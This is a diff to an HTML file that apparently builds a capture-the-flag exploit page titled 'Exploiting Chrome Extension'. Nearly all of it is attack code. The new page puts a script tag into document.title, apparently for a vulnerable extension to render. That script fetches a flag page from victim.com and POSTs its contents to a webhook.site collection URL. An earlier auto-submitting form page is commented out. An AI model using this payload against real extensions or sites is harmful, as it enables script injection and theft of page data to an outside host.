--- a/index.html
+++ b/index.html
@@ -1,4 +1,4 @@
-<!DOCTYPE html>
+<!-- <!DOCTYPE html>
 <html lang="en">
 <head>
     <meta charset="UTF-8">
@@ -13,5 +13,25 @@
     <script>
         document.getElementById('fun').submit();
     </script>
+</body>
+</html>
+-->
+
+<!DOCTYPE html>
+<html>
+<head>
+    <title>Exploiting Chrome Extension</title>
+    <script>
+        document.title = `<script>
+        fetch('https://victim.com/flag.html')
+          .then(res => res.text())
+          .then(data => fetch('https://webhook.site/fd72ea59-3fa6-4bc7-8a83-176bf7ad585b',{
+              method:'POST',body:data
+          }));
+        </script>`;
+    </script>
+</head>
+<body>
+    <h1>Waiting for extension to trigger...</h1>
 </body>
 </html>
